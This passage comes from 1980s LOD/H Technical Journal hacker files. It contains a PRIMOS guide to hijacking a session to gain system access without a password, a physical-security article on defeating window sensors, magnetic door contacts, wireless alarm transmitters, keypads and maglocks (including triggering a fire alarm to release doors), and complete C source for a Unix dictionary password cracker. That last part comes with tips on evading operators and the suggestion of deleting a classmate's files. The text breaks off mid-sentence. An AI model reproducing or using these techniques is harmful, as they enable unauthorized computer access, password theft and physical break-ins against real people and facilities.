CPL Tour. The program will be inputing commands and the system will execute them. There is a bug within that program which can be used to your advantage. First execute it by doing CPL Tour, once the program has begun it will have a couple of pauses (while it is loading). First hit 3 Control P's. By doing this you are breaking out of the program. Next, attach to the SYSTEM directory. Once attached, SLIST the Tour program (Slist Tour). When it begins listing the file do a Ctrl-P again. Now, go into the editor (ED). When you receive the $ prompt hangup on the system. The system is now hung in the Editor, and the Tour program is still executing (from the Demo or Games account). You must call right back (and prey that the line hasn't been captured by a system operator). You will be put right into the tour program, while it is being executed. You will need no pw to login as you are attached right to it. You now have access to write and read anything your little heart desires. If you plan on trying this, do it at night, since you will most likely be the only one on the system. Always do it on a 1 line system. Never on a Prime that is used constantly (unless you have perfected this method). Remember to call right back after you have hung up, or someone like BIF may call and wonder why he did not get the ID prompt. So be careful. I also know different ways you can modify the tour program to have a little fun (using CPL commands) but due to obvious reasons I will not publicize the lines. If you are interested please get in contact with me. <Message> To send a message to someone on the system type "Message username". It would look something like this: OK, Message PRIME Hi, can you tell me why the system was down last week. Note: Remember DON'T use ?'s. The user PRIME will receive the message, unless he's busy or has executed a command which refuses messages. It would look like this: OK, Message Prime Hi, can you tell me why the system was down last week. User Prime not accepting messages If you do not receive that message then the user will get your message. This is like Phone username on VMS, except on a VMS it looks better (chuckle). <Mail> To send mail you type: "Mail xxxxx". If I wanted to send mail to user SYSTEM, I would type "Mail System", I would be thrown into the mail subsystem. To end a message hit a c/r on a blank line. You will be notified when you get mail when you first logon. It will say "(mail waiting)". To read it type "Mail". If you have no mail and you type Mail it will say "sorry no mail today". Once again no ?'s are allowed or the contents of the mail will be erased. <Status> Status followed by a topic will give you a system status on that topic. You can get information on the following using Status- Status ALL = Information on who is logged in and devices. Status DI = Information on devices, what devices are in use. Status SYSTEM = Information on what version of Primos is being run. Status NETWORK = Information on Netlink, and network nodes. There are others but these are probably the most important, and of course, "Status Users" which I mentioned earlier, which will give you a list of users currently logged in. <Change_Password> Allows a user to change his password. It will look something like this: OK, Change_Password Old Password:Z102345 New Password: Verification : Notice how new password and verification don't echo, this is for security purposes so don't be alarmed. Changing passwords of hacked accounts is not a good idea. We don't want to get detected now do we? <Info> Gives info on the system. ie-who it belongs to, what version its running on and new features. <Languages> Gives a list of languages the system supports. <Help> Gives a list of help commands and a small description. <Netlink> By typing Netlink at the main prompt (OK,) you will be thrown into the Netlink utility. Netlink is found on Primenet (which is the networking software for Primes). Netlink is used to communicate with other remote systems. You will find the netlink utility on most packet networks, since there is much use for it there. Netlink can be accessed by all users on the system. Once netlink is typed you will get a message, similar to: Netlink version x.xx >(this being the main prompt) Once again on-line help is available if you have no idea what you are doing. To call another system, you would use the NC xxxxxx format. If you were on Telenet using Primenet supporting the Netlink utility you could call any system on Telenet. For example if I wanted to call my favorite VMS I would type- >NC 201111 201111 being the address. You will get a pause for about 5 seconds and you will be connected to the remote system. It is fairly slow, but it is sufficient. The whole process would look something like this- OK, NETLINK Netlink [Version 1.x] >NC 201111 <Pause for about 5 seconds> Username: Password: Username and Password shows that I have connected to the Vax running VMS. I would log onto the remote system (the VMS in this case) like I would any other time. Once I am done looking around on the remote system I can just logoff by doing a Control P (this will put you back into the utility), or I could just logoff properly by using the VMS logout command and be put back into the Netlink utility program. If you ever receive the message "WILL NOT ACCEPT COLLECT CONNECTION" from a system off of Telenet, you can just reverse the charges to the Prime you are on and log onto the remote system. You can do this by using the NC format above. This allows you to bypass the need for a Telenet ID. Netlink won't compare to something like DECNET but it gets the job done. Remember if you aren't too sure what you are doing just type "help" for on-line help. To exit the Netlink utility type "Quit" or just hit Control-P. This will give you the main prompt once again. <Upcase/Lowcase> Toggles upper and lower case. <Control characters> Control S = Pauses Text Control P = Aborts Text or Utility Control Q = Resumes Text <Author Notes> If you gain access to Primos supporting on-lines games, which can be found by (AT)taching to the Games directory. There may be a game called "FRITZ", it's a fun game dealing with questions on the Primos system. It can also test your knowledge on the system. Usually if a person hangs up on the system without properly logging off you may be able to call the system and be attached to that account. This usually works on systems with one line. I called a Primos one day and was attached to a system account modifying a config program. It was interesting... There are many Prime systems on Telenet so I suggest getting ahold of the updated LOD/H Telenet Directory from Issue I and jot down a few. Preferably Primenet, since they support the Netlink utility. ============================================================================ Here's a list of some major differences between PRIMOS version 18.x.xx and Version 19.x.xxx 1. Version 19 supports Access Control Lists, which allows the user to set a specific access right on his/her directory. 2. Version 19's security has been tightened. A user will be prompted with the password prompt. A user is usually allowed only 1 unsuccessful login, if the ID or password is incorrect the user will be logged off. 3. Once a user has tried to execute a command/file without sufficient access rights he will be logged off of the system. The account will automatically be suspended until an operator has contacted the user. 4. Users have to change their password every 30 days. 5. The "CHAP" command can be executed by users to toggle their priority level. 6. Netlink has been enhanced with more commands. 7. A primary password may be used for better security. 8. After logging out you will be disconnected from the system, rather than prompted with the ER! prompt. 9. Dec VT132 is the commonly used operator terminal on version 19. 10. There have been new enhancements to the editor. ============================================================================= As you can see, PRIMOS is a very versatile system. It's not very popular among hackers since there hasn't been too much information released on it. Most commands will be the same on version 18, if not just execute the Help file. The final element to PRIMOS will be alarm (it will be similar to the one on VMS). I will go a little more in-depth on the ALARM system in Part II (I will have more information on it, and by that time it will be inserted in later revisions of version 20). Basically the alarm will record all unsuccessful logins and will alert the operator at the terminal. The alarm will be a standard part of PRIMOS and can not be shut on and off, from a reliable source, the alarm may come in a different package. ============================================================================= Part II: I will discuss new commands, creating accounts, go more in-depth on the Netlink utility, and any other changes in PRIMOS Version 20. Until then.... You can reach me via the TJ staff account, for questions, requests for more information, and corrections to this article. Gfiles: (1-8, ^4),?,Q : The LOD/H Technical Journal: File #5 of 10 (ISSUE #2) Lex Luthor and The Legion Of Doom/Hackers Present: Identifying, Attacking, Defeating, and Bypassing Physical Security and Intrusion Detection Systems PART II: THE EXTERIOR INTRODUCTION: ------------- The 'exterior' refers to the area directly outside of a building and the things within the building which are on the exterior. These obviously are: doors, air conditioning ducts, windows, walls, roofs, garages, etc. I don't believe the word 'exterior' is the exact definition of what this article will encompass, unlike the 'perimeter', but it's the best I could come up with. This article primarily is of an informative nature, although methods of "attacking, defeating, and bypassing" will be explained. Its purpose is not specifically to encourage you to breach a facility's security, although I acknowledge that it could be used as such. Some of the devices mentioned in the physical security series are used in homes as well as corporate, industrial, and military installations, but my aim is specifically towards the commercial aspect of buildings, not homes and apartments. Entering a facility to obtain information such as passwords or manuals is one thing, breaking into someones' home to steal their personal belongings is another. THE EXTERIOR: ------------- A facility's second line of defense against intrusion is its' exterior. The exterior may have any or all of the following: * Window breakage detectors * Keypad systems * Card access control systems * Magnetic locks and contacts * Security lighting and CCTV CCTV which is also used, was mentioned in Part I: The Perimeter. Card Access Control devices will be mentioned in Part III: The Interior. WINDOWS: -------- Windows are a large security hole for buildings. You may notice that many phone company buildings and data processing centers have few if any windows. There are two things that can be done to secure windows aside from making sure they are locked. One is to make them very difficult to break, and the other is to detect a break when and if it occurs. Here is a quick breakdown of the common types of glass/windows in use today: Plate glass: Can be cut with a glass cutter. Tempered: Normally can't be cut. Breaks up into little pieces when broken. Safety: You need a hatchet to break this stuff. Wire: This has wire criss-crossed inside of the glass, making it very hard to break, and even harder to actually go through the opening it is in place of. Plexy: Very hard to break, doesn't really shatter, but can be melted with the use of a torch. Lexan: This is used in bulletproof glass. One of the strongest and most secure types of glass. Herculite: Similar to Lexan. Foil tape: ---------- This is by far the most common, and probably the most improperly installed form of glass breakage detection, which also makes it the most insecure. This is usually a silver foil tape about 5/16" wide which should be placed on the whole perimeter of a glass window or door. In the case of plexyglass or a similar material, the tape should be placed in rows separated by 6-12 inches. The older foil was covered with a coating of eurathane or epoxy which enabled it to stick onto the glass. The newer foil has an adhesive back making installation much easier. There should be two connectors which are located at the upper top part of a window, and the lower part of the window which connects the foil to the processor, thus, completing the circuit. Foil may or may not have a supervised loop. If it is supervised, and you use a key to scratch the foil (when it is turned off) making a complete break in it, an alarm will sound when it is turned on. Foil is commonly used as a visual deterrent. Many times, it will not even be activated. The easiest way to determine if the facility is trying to 'B.S.' you into thinking they have a security system, is to see if there are any breaks in the foil. If there is a clean break, the 6-12V DC current which is normally making a loop isn't. Thus, breaking the glass will do nothing other than make some noise unless you take steps against that happening. As was stated, foil is the most improperly installed type of glass breakage detection. When it is installed improperly, it will not cover all the area it should. An easy way to defeat this is by the following diagram: +-------------+ ! ........... ! ! . . ! . = foil tape ! . put . ! - = top/bottom of door ! . contact . ! ! = sides of door ! . paper . ! / = dividing line between 2 pieces of contact paper ! . in . ! $ = ideal places for initial breakage ! . this +-! ' = clear area or outline of second piece of contact paper ! . area ! ! <-- door handle ! . +-! ! . . ! ! ........... ! !/////////////! !'''''''''''''! !' '! !$'''''''''''$! +-------------+ As you can see, the installer neglected to place the foil all the way down to the bottom of the glass door. There is enough room for a person to climb through. They may have thought that if someone broke the glass, it would all break, which is normally correct. But if you obtain some strong contact paper, preferably clear, adhere it to the glass as shown, and break the bottom part at the '$' it will break up to the '/' line and thats it. Thus, leaving the foil in-tact. This will work on tempered glass the best, and will not work on Lexan or Plexyglass. There is a transparent window film with a break strength of up to 100 pounds per square inch which can be obtained from Madico, Inc. It is called, Protekt LCL-400 XSR, and makes glass harder to break and stays essentially in place even when broken. This can be used in place of the contact paper. Obviously, it is also used to protect glass from breakage. Audio discriminators: --------------------- What these do is to compare the frequency of the sound that glass makes when it breaks, to the actual breakage of glass. This frequency is relatively unique, and can accurately determine when and if glass actually breaks. Your best shot at defeating this, is to do the same thing as mentioned above. Cover the glass with a film which will keep the glass in place after breaking it. If you break it properly, the frequency will not match that of glass breaking when it is not held in place. Glass shock sensors: -------------------- These devices detect shock disturbances using a gold-plated ring that "bounces" off a pair of normally closed gold-plated electrical contacts. This will send a signal to a Signal Processor (SP) which determines whether an alarm condition exists. There are two settings the SP can be set to which are: SHOCK-BREAK: This mode requires an initial high energy shock, followed by a very low engery shatter. The shatter must occur within about 1 second before an alarm can occur. SHOCK-ONLY: An alarm will occur once the first shock is detected. This may or may not be accompanied by a shatter. Obviously the more secure setting for a facility would be shock-only. Though, both are equally dangerous for an intruder. The methods mentioned earlier about preventing the glass from shattering will not work when this device is used in the shock-only mode. It may work, depending on the type of glass, if it isn't in the shock-break mode. These devices are usually found protecting large plate glass and multi-pane windows. They are roughly 2 inches by 1 inch and can be mounted on the frame of a window, between two windows, or on the glass itself. These sensors can cover up to 150 square feet of glass. These are the best of the lot for window breakage detection. Most devices have a constantly supervised loop, and if you cut a wire, that loop will break, and cause an alarm condition. They are typically placed somewhere on the window pane and not on the window, thus, making them harder to visually detect...from the outside that is. Though from close inspection, you may be able to determine if these are in place. Obviously they can easily be seen from the inside... The sensor is normally placed no more than a couple of inches from the glass. If it is too far away, or if you can move one over 4 inches from the glass, its detection capability is somewhat diminished. It is probably screwed in, and has an adhesive backing, so moving it may not be too easily accomplished. False alarms are not common, unless the windows rattle. There are sensors available which are not as sensitive, and will not "overreact" to slight vibration, these are called "damped" sensors. MAGNETIC CONTACT SWITCHES: -------------------------- The word "contact" is somewhat contradictory to how these devices are commonly used. In most cases, the magnet and the switch are not in physical contact of each other, rather, they are in a close proximity of each other, although there are some models which are indeed in contact with each other. There are various types and levels of security that these devices possess. They can be surface mounted (floor or wall mounted) or concealed (recessed). The most common are surface mounted which are placed on top of the door. When inspecting for these devices, examine the whole perimeter of the door, from top to bottom. Most doors have a +/- 1/4" gap all the way around, in which you should also check for concealed contacts. These are round cylinders that are recessed into the door or wall, which obviously makes them less visible. The other contacts range from miniature, with dimensions as small as 1x1/4x1/4" to the larger ones at 5x2x1". They are usually in colors of off-white, grey, and brown and are mounted with nails, screws, double sided tape, or are epoxied onto the door or wall surface(s). The switches are hermatetically sealed, as are the glass breakage detectors mentioned earlier, can operate in moist or dusty areas, are corrosion resistant and have indoor/outdoor use. They can also be used on windows, fence gates, truck trailors, boats, heavy equipment, safes, and vaults. The different types of devices in order of least to most secure are: 1) Standard Magnetic Contacts: These consist of one reed switch and one magnet. They may be defeated with the use of a second magnet which would be placed in the vicinity of the switch, while opening the door or window and while closing them also. This way, the switch never detects the abscense of the magnet, thus, no alarm occurs. 2) Biased Magnetic Contacts: These consist of one reed switch with a "biasing" magnet that changes the state of the reed switch. The magnet is then placed at the correct distance to offset the bias magnet, creating a "balanced" condition. The switch can be defeated with the use of a single magnet. The trick is to: A) You must have the correct size magnet, which can be accomplished by obtaining the same type or model as what is in place. B) You must determine the correct polarity which may be accomplished with either a compass, or if the alarm is not activated, (possibly during normal business hours), by opening the door and placing your magnet near the device's magnet and determine the polarity. If you do not have much time, then its a 50-50 shot. C) The last criteria is to keep the magnet at the same or close to the same distance from the switch as the original magnet was. In some cases the device will be placed in such a manner that correct placement of the second magnet will be difficult if not impossible. 3) Balanced Magnetic Contacts: These consist of one biased reed switch and one unbiased reed switch. The second reed will be of the correct sensitivity and position so as to not operate with the actuator magnet. It must also operate with the addition of a second magnet. It could be defeated by a single magnet that is moved into place as the door is opened. This requires coordinated movement of the door and magnet. 4) Preadjusted Balanced Magnetic Contacts: These consist of three biased reed switches and may have an optional fourth tamper reed. Two reeds are polarized in one direction and the third is polarized in the opposite direction. The housing consists of three magnets with the polarity that corresponds to the switches. It is preadjusted to have a fixed space between the magnet and the switch. This is the most secure type of magnetic contact switch. The three-reed type could be defeated by using one of its own magnets, but not a bar magnet. The type with four reeds cannot be defeated with either of the two magnets because the fourth reed will activate when a magnet is brought within actuating distance. If you are able to determine which is the tamper reed, you can try to keep the three magnets in contact with the corresponding reeds. At the same time you must have the correct polarity, and in the process, not activate the tamper reed. If you accomplish those, you may be able to defeat it. This will most likely require two people and a bit of luck. The most secure devices are made of die cast aluminum instead of plastic, are explosion proof (for vaults and safes), have terminals mounted inside the housing which provides protection from tampering and shorting, and have armored cabling. A wider break distance will prevent fasle alarms due to loose fitting doors, thus, if the door is loose fitting it may have a wide break distance. The wider the break distance, the easier it is to defeat. This will allow you to introduce another magnet in cramped places since the door can be opened a wider distance before an alarm condition occurs. Some devices allow the installer to adjust the gap with a screwdriver instead of placing the switch a certain distance from the magnet. In some devices, use of any ferrous (Iron) material in the vicinity of the switch can cause a change in gap distance. As a gap is increased, the switch may bias and latch. When latched, the switch will remain closed even when the magnet is removed!! This means that when you open the door, it thinks that the door is closed, and you are able to stealthily go thru the door. You can test for a latched condition by removing the magnet (opening the door) and using a Volt Ohm Meter, if it reads INFINITY, the switch is OK. If not, it may be latched. If you can adjust the gap to the point of it being latched, without being noticed, you've got it made. Wireless Switch Transmitters: These are essentially the same as the other devices mentioned except that they use an FM digital signal for alarm conditions (a door or window open) and for maintenance conditions (low battery, transmitter malfunction/removal, long term jamming, etc). There should be continuous polling and a maintenance alarm will occur if the signal is missing for a few minutes. The transmitters are usually powered by a couple of AAA 1 1/2V pen cells, which can last a few years. Most devices will send out a signal after a specific interval. Common intervals are about every 30 seconds. You can verify if the device is indeed sending out a signal by placing a milliammeter capable of reading 10 ua in series with the batteries and reading the discharge current. If it occurs every 30 seconds, then it is sending out a signal every 30 seconds. A hint that this type of device is in use, is since range generally decreases as a transmitter gets closer to the floor, the transmitter will be placed as high as possible. The transmitter probably has a range of about 200 feet, although some environments may reduce this range due to construction materials inherent in the building. The frequency should be in the 314 MHz range. As was mentioned, these are the same as regular magnetic contact switches except that there is a transmitter instead of a wire for transmitting alarm and maintenance conditions, thus, the switch can be defeated in the same manner as has been previously stated. Defeating an X-mitter is much easier than defeating a wire. You can defeat the transmitter if you can sufficiently block or diminish the signal strength so that the receiver is unable to receive it. Radio waves have a tendency to bounce and reflect off of metallic surfaces, which includes foil, and pipes. If you have located the transmitter, which should be attached to or near the actual contact, you can block or jam the signal as you open the door. Hopefully this will be between the 30 second interval that it sends an "i'm ok" signal to the receiver, but it's not critical to do so. As was stated, most receivers will not cause an alarm condition if it doesn't recieve a signal once or twice, but after a few minutes it will. So, as you open the door, it tries to send the signal, you block or jam it, and you slip through without detection. This information can also apply to security relating to the 'interior' of a facility, ie. Part III of this series. Many of the techniques for defeating magnetic contact switches are geared toward being inside the facility. Many facilities have switches on doors to monitor movement of personnel within the facility. But it also is used on the exterior and some methods will work on doors and possibly windows on the exterior. Of course, you have to have a way of opening the door, and that follows. DOORS AND LOCKS: ---------------- As you know, doors are the primary entrance point into a building. Since they are the primary target for unauthorized entry, they have the most security added. I am not going to mention anything about the art of picking locks. Although mechanical locks and keys have been the most common type of security used in the past as well as today, I am going to concentrate on the more advanced security systems in use. Pushbutton keypad locks: ------------------------ There are two types, mechanical and electronic. I will go into detail about each. I will give you a few examples of these devices which comes directly from brochures which I have been sent. I am merely summing up what they said. Electronic: Securitron DK-10: This is a unit which has dimensions of 3x5x1". It has a stainless steel keypad which is weatherproof, mounts via hidden screws and has no moving parts. The keypad beeps as each button is pressed, and an LED lights when the lock is released. It is slightly different in appearence than most other electronic keypads: +----+ ! 1A ! Each block (1A/B2) is one button. Thus, there are 5 buttons total on ! B2 ! this device. The "/"'s at the bottom of the device represents the name ! ! of the company and possibly the model number of the device. ! 3C ! (ie. Securitron DK-10). It has 2-5 digit codes. Thus, a 2 digit code ! D4 ! will have a maximum of 5 the the 2nd power (5 squared=25) combinations. ! ! Of course it increases as the number of digits used increase. ! 5E ! This unit has an 11 or 16 incorrect digit threshold. If it is reached ! F6 ! a buzzer sounds for 30 seconds during which it will ignore any entries. ! ! When a valid code is entered, the lock is released for a 5, 10, 15 or ! 7G ! 20 second interval. ! H8 ! ! ! ! 9K ! ! L0 ! ! ! !////! !////! +----+ Sentex PRO-Key: This device has a keypad resembling one of a payphone. It is a sealed, chrome plated metal keypad. It has the standard 10 digits with * and #. It can have up to 2000 individual codes with a lenght of 4 or 5 digits. It allows 8 time zones, "2-strikes-and-out" software which is its invalid code threshold, and anti-passback software. Obtaining codes-- Your aim is to obtain the correct code in order to open the door. Plain and simple. There are various methods in which you can accomplish this. You can try to obtain a telescope or similar device and attempt to get the exact code as it is being entered. This is obviously the quickest method. If you cannot discern the exact code, the next best thing is to determine exactly how many digits were entered, since most devices have variable code lengths. If you can make out even one digit and when it was entered, you will substantially reduce the possibilities. Another method is to put some substance on the keypad itself, which preferably cannot be noticed by the user. After someone enters a code, you can check the keypad to see where there are smudges or if you use what the police use to find fingerprints, you can see what digits were pushed, although you will have no idea in what order. This will drastically cut down the combos. Say that someone enters a 5 digit code on a 10 digit keypad. You check the keypad and see that, 1,2, 4, 7, and 9 were pushed. If you attempted brute force, you will have 25 combinations to try. If a 4 digit code 'appeared' to be entered, as 0, 2, 4, 8 were 'smudged', it is possible that one of the digits were pushed twice. Keep that in mind. A way to know for sure would be to clean the pad and 'dust' it, most fingerprints will be clear, but one will be less clear than the others. Thus, you can be reasonably sure that the digit which is smudged was pressed twice. Thresholds-- Brute force attempts on electronic keypads is suicide. Once a certain number of invalid attempts has been reached, it will probably be logged and a guard may be dispatched. Your best bet is to try once or twice, wait (leave), try once or twice again, wait, etc. Sooner or later you will get in. Auditlogs-- Many of these devices are run on micro's. The software that runs these devices allows for an increased ability to monitor the status of these devices. They can track a person throughout the facility, record times of entry and exit, and when the maximum invalid code threshold is reached. Anti-passback-- This term is commonly used in card access control, but it applies differently to keypads. This feature prevents the use of two codes being used at the same time. That is, Joe Comosolo uses code #12345 and enters the building. Then, you enter Mr. Comosolo's code, #12345 but the system knows that Joe is already in the building, and has not entered his code before leaving. Thus, you do not gain access, and that action is most likely recorded in the audit log. This option will only be in effect when: 1) Each individual has a different code. 2) There is a keypad used for entry, and a keypad used for exit. Tailgating-- This occurs when more than one person enters through a controlled access point. Joe enters his code, and goes into the building. You follow Joe, and make it in just before the door closes, or in the case of the devices waiting 10 or 20 seconds before the door locks again, you let it close, and open it before it locks. Open access times-- During peak morning, noon, and evening hours, a facility may set the system to not require a code during, say, 8:55AM to 9:05AM, thus, enabling most anyone to gain entry during that time. Hirsch Electronics Digital Scrambler: This has a 12 button arrangement with the addition of a 'start' key. This is probably the most secure type of keypad security system in use today. It only allows a viewing range of +/- 4 degrees horizontally and +/- 26 degrees vertically. This means that it would be very difficult to watch someone enter their code, thus, eliminating the 'spying' technique mentioned earlier. The buttons on the keypad remain blank until the start button is pressed. Then, instead of the numbers appearing in the usual order, they are postitioned at random. A different pattern is generated each time it is used. The numbers are LED's in case you were wondering. This eliminates the 'dusting' technique which can be used on the other types of keypad systems. The Model 50 allows control of 4 access points and has 6 programmable codes. The Model 88 controls 8 doors and has thousands of codes. The features that this device has makes it very difficult to do anything but use brute force to obtain the code, but since it is controlled and monitored by a computer, the audit logs and maximum invalid code threshold can put a stop to that method. The other alternative, which applies to any of these systems, is to socially engineer the code from someone, or if you know someone, they may give you it. Both methods are not ideal. I have come up with a way to reduce the possibilities to a very reasonable level, but I will not explain it here. If you are really interested, contact me via the LOD/H Technical Journal Staff account on the Sponsor boards. Mechanical Keypad locks: The best thing about these types of locks, is that they are 100% mechanical. This means that it is not computerized, and there is no monitoring of bad codes or the door staying open for too long, or anything! All you have to worry about is getting a correct code. Probably the largest manufacturer of these devices, is Simplex Security Systems, Inc. The devices are called, Simplex Keyless Locks. Every lock of theirs that I have seen, has 5 buttons. Combinations may use as many of the five buttons the facility cares to use. The biggest problem with this type, is that there is the option of pushing 2 buttons at the same time, which would be the same as adding another button to the lock. Thus, button 1 & 5 can be pushed simultaneously, then button 3, then buttons 2 & 4 would be pushed at the same time. These are supposedly, 'keyless locks' but on many models, a 'management key' can be used to override the security code, so obtaining the key, is a way to bypass the code. Both the spying and dusting methods apply to these devices, and the best thing is that you can try all possiblities you want without an alarm signalling. Magnetic locks: --------------- These are commonly called 'Magnalocks' and use only the force of electro- magnetism to keep a door shut. Typically, the magnet is mounted in the door frame and a self aligning strike plate is mounted on the door. These locks provide the capability of up to a few thousand pounds of force for security. They are not only found on doors, but can be put on sliding doors, glass doors, double doors and gates. The magnet and plate is roughly 3 inches by 6-8 inches. There are a few things you should try to findout about these devices before attempting anything: Is there backup power? (ie. Usually a 12-24V battery can be used) Obviously, if there is no backup power and there is a power outage, there will be nothing to stop you from opening up the door. Most devices have the capability to monitor whether the door is closed, which is what magnetic contact switches do. But there is another option, which will provide a voltage output signal on a third wire, which determines whether the lock is powered and secure. If there is no monitoring of whether the door is secure, then there is no way of knowing it is locked, unless it is physically checked. There are optional LED's which can be mounted on the lock to indicate its status. For the Securitron Magnalock, an amber LED will indicate that the lock is powered. A green light shows the lock is powered and secure. Red, shows that the lock is unlocked, and no light means there is a violation, ie. the power switch is on, but the lock is not reporting secure. You can use these lights to your advantage. If a magnalock is tied into a fire alarm system, such that it is automatically released in the event of fire, then you or an accomplice can signal a fire alarm and sneak in while the lock releases. MISCELLANEOUS: -------------- LED's: Some devices or models of devices have LED lights built into/onto the device. They are usually used to indicate a secure or insecure condition. This applies to magnetic contacts, shock sensors, and other devices. Even when the security system is not in a secure mode, (for example, during regular business hours a system may be off, but after 6pm it is turned on) the LED will light when an alarm condition occurs. For example, you bang on a window that has a shock sensor, and the red LED lights, or blinks for a few seconds. You can use this to your advantage to test theories or methods during a time which a receiver pays no attention to the signals sent to it. Then when it is turned on, you will have more confidence in what you are doing. Supervised loops: Most if not all devices will have supervised loops for constant monitoring of battery power, electrical shorts, and defective devices. If the security system of the facility is very old, loops may not be supervised, and simply cutting a wire will disable the alarm. Naming of devices: For large orders, manufactures of security devices may put the facility's name on the product instead of their own. This is probably for esoteric purposes. This hampers your efforts in obtaining the name of the maker of any type of product for purposes of geting additional information and brochures on the device. Single person entry: These devices include mechanical and optical turnstiles which meter people in and out one-by-one. Mantraps, usually found in high security installations are double-doored chambers which allow only one person in at a time, and will not allow the person out until the system is satisfied he is authorized. Extreme weather conditions: Unlike perimeter security devices, most exterior security devices are either placed inside the facility, or can withstand just about any type of environmental condition, so there is not much that you can take advantage of. CONCLUSION: ----------- People typically make security a lower priority than less important things. Those who do not upgrade their systems because of spending a few dollars are rewarded by being ripped off for thousands. I have no pity for those who do not believe in security, physical or data... ACKNOWLEDGEMENTS: ----------------- Gary Seven (LOH) And of course, the information from brochures, and questions answered by the nice technical support people for the companies specifically mentioned in this article. Gfiles: (1-8, ^5),?,Q : The LOD/H Technical Journal: File #6 of 10 A Discreet Unix Password Hacker ------------------------------- By Shooting Shark / Tiburon Systems 4 Mar 87 Imagine this familiar situation: you have an account on a Unix system. Perhaps it's your account on your school's VAX, or an account you've hacked yourself. You'd like to collect more passwords to this system - perhaps to the 'root' or 'bin' accounts so you can take control of the system, or the password of the class hotshot who's going to get an 'A' on his compiler project and upset the curve unless you go in and erase all of his files. The problem is getting these passwords. The most obvious method would be to manually enter login/password combinations until you found one. This is slow (>10 seconds per try), will give you sore fingers, and multiple invocations of the 'login' program may be noticed. You could write a program on your micro to dial up the site (*if* it has a dialup) and try passwords from a login/password pool, but this is just as slow, ties up your computer and your phone line, and again is subject to easy detection. The solution to this problem is to have the system itself hack passwords for you. It can do this unattended and at a considerable speed while you go about your life, and will be difficult to detect by system demigods. Here is the C source for my program. Upload it to your Unix site and compile it. --- cut here --- /* * hpw.c v1.4: 8 October '86 * Written by Shooting Shark / Tiburon Systems * */ #include <sys/file.h> #include <stdio.h> #include <pwd.h> #include <signal.h> struct passwd *pwd, *getpwname(name); int len, abort(), endpwent(); char crbuf[30], *strcpy(), *crypt(), *getpass(), *getlogin(), *pw, pwbuf[10]; main(argc, argv) int argc; char *argv[]; { FILE *fopen(), *fp; char *uname; signal(SIGINT,abort); if (argc !=3) { printf("usage : %s username pwfile\n",argv[0]); exit(-1); } if (!(pwd =getpwnam(argv[1]))) { printf("unknown user : %s\n",argv[1]); exit(-1); } if ((fp = fopen(argv[2], "r")) == NULL) { perror(argv[2]); exit(-1); } sprintf(crbuf,"%s",pwd->pw_passwd); printf("hacking %s\n",argv[1]); printf("encrypted password : %s\n",crbuf); while (fgets(pwbuf, 20, fp) != NULL) { pwbuf[strlen(pwbuf)-1] = '\0'; pw = crypt(pwbuf,crbuf); if (!strcmp(pw,crbuf)) { printf("%s ==> %s\n",argv[1],pwbuf); exit(0); } } printf("done -- password not found.\n"); endpwent(); } abort() { printf("aborted while trying '%s'\n",pwbuf); exit(-1); } --- cut here --- (Note - written on a Pyramid 90x running Berzerkeley Unix 4.2. If you're running SysV or something else you may have problems. You probably won't, but you might.) Now that you have the above compiled into a file called 'hpw,' invoke it with % hpw username pwfile ( % is the shell prompt; don't type it...) where username is the login name of the user who's password you'd like to hack, and pwfile is the path of a text file that contains the pool of likely passwords. Most sites will have a file of words for the 'spell' spelling checker - it will probably be /usr/dict/words and contain at least 15,000 potential passwords. Hpw starts by loading the user's encrypted password from /etc/password and stores it in crbuf. It then starts reading words from the file you've specified, encrypts them using the crypt() routine, and compares them to the encrypted password. If they match, the program outputs a line like: 'shark ==> hispassword' and quits. If they don't match, it goes on to the next potential password. If the program goes through the entire list and doesn't find the correct password, it prints 'done -- password not found' and quits. If you hit ^C (or BREAK, or whatever your interrupt character is) the program tells you which word in the file it had gotten to when it was interrupted and quits. Then, the next time you attempt to hack that login name, you can start where you left off during the previous session. The beauty of this program is that you can run it in background with the output sent to a file and then log off, or play rogue, or whatever. To hack melody's password using /usr/dict/words as your pool file, and to have all messages generated by the program sent to a file called 'out.file' and run the program in background, you'd enter from csh: % hpw melody /usr/dict/words > out.file & the & signifies a background process. The system will print something like: [1] 90125 this means it's job number 1 for you, and has process id 90125. To bring the program back into the foreground, enter: % %1 and to kill the process, type % kill 90125 if you have hpw running in background and you're in csh, you can just log off and the program will continue to silently gather passwords. If you're under the sh shell, you'll need to run the program with 'nohup' (read the man entry for more info) or sh will kill the process when you log out. Anyway, after you've given the program sufficient time to go through the list (more on this in a second), log in again. If the output file exists, the program has completed its job. Otherwise use 'ps' to see if the program is still running. cat the file and you'll see something like this: hacking melody encrypted password : K4h7iidD1vX0a melody ==> joshua (or 'done -- password not found') make a note of melody's password, rm the incriminating output file, and move on to the next login name. Easy, huh? Now for the bad news: The designers of Unix weren't stupid. They deliberately designed the crypt() routine so that it's unique (it's a minor deviation of the DES, so you can't use a fast DES-busting program to attack the /etc/passwd file). This program uses the fastest possible method of brute-force hacking Unix passwords, but it isn't too speedy itself. I wrote the program on a Pyramid 90x, which is a 32-bit multi-processor RISC-architecture machine. When running this program in foreground while I was the only user on the system, it averaged 2 seconds per try. You can expect this performance on one of the better VAXen. If you're on a Cray (sure...) it might take the program 1/8 second per hack. If you're on an AT running XENIX or a PDP-11/44, expect 5 seconds per try. (I really don't know how long it would take, why don't some people time it and give me feedback...I'd appreciate it.) Realistically, if you're using the system's spelling-checker word list that contains 20,000 words and you're running the program in background, give it at least 12 hours. If you have a system operator who likes to keep track of people's long-running jobs, tell them via mail that you'll be computing the limit of 1/x to infinity or something like that and they'll leave the process alone. If you have your own file of 100 probable passwords (such as 'joshua,' 'secret' or the person's name) it will take 10 minutes or so to complete. Sensible selection of potential passwords (most UNIX systems don't allow passwords of less than 5 characters; attempt to change your password to progressively shorter and shorter words until you find out what your system's minimum length is) and running the program at strategic times (like after midnight) will cut the time down. Hackers who know 'C' (and everybody should know C by now; it's the best language ever designed) will want to modify the program I've presented. You may want to 'hard code' the username to be hacked and the pwfile path; 'progname root word.file' on a process table might look a LITTLE suspicious to snoopy system operators (and it goes without saying that you shouldn't call the program 'hack' or 'hpw', nor leave the source unencrypted in your directory). Also, since the crypt() routine is universal, you can hard-code the 'crbuf' variable with the encrypted password (from /etc/passwords) of a user on another system! When hardcoding a password, make sure you spell it correctly, and that it contains exactly 13 characters of upper & lower case, and/or numbers. I once successfully hacked the root account of an AT&T Micro in Michigan on my local Pyramid 90x. Thus I didn't need to take up space on the guy's file system with the source and didn't have to run the program on his slow system - once I obtained the 6300's /etc/passwd file from the person who hacked into the system, I attacked it at my local site. If you happen to have a system of your own that runs 